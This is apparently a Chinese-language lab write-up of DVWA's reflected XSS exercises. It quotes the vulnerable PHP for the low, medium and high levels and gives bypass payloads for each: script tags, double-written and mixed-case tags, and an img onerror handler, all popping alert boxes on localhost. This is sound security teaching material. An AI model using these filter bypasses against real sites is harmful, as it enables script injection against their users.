本文共 1470 字，大约阅读时间需要 4 分钟。

Reflected XSS Source（Low）

vulnerabilities/xss_r/source/low.php

代码分析

<?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Feedback for end user     echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?>

$_GET[ ‘name’ ]无任何过滤

漏洞利用

输入，成功弹框：
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28233%29%3C%2Fscript%3E

Reflected XSS（Medium)

代码分析

<?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input     $name = str_replace( '<script>', '', $_GET[ 'name' ] );     // Feedback for end user     echo "<pre>Hello ${name}</pre>"; } ?> 

可以看到，这里对输入进行了过滤，基于黑名单的思想，使用str_replace函数将
输入中的<script>删除，这种防护机制是可以被轻松绕过的。

漏洞利用

双写绕过

输入<sc<script>ript>alert(233)</script>，成功弹框：

大小写混淆绕过

输入<ScRipt>alert(233)</script>，成功弹框：

Reflected XSS（High)

代码分析

<?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input     $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );     // Feedback for end user     echo "<pre>Hello ${name}</pre>"; } ?>   

$name = preg_replace( ‘/<(.)s(.)c(.)r(.)i(.)p(.)t/i’
使用黑名单过滤输入，函数用于正则表达式的搜索和替换，这使得双写绕过、大小写混淆绕过（正则表达式中i表示不区分大小写）不再有效。

漏洞利用

虽然无法使用<script>标签注入XSS代码，但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。
输入<img src=1 onerror=alert(/233/)>，成功弹框：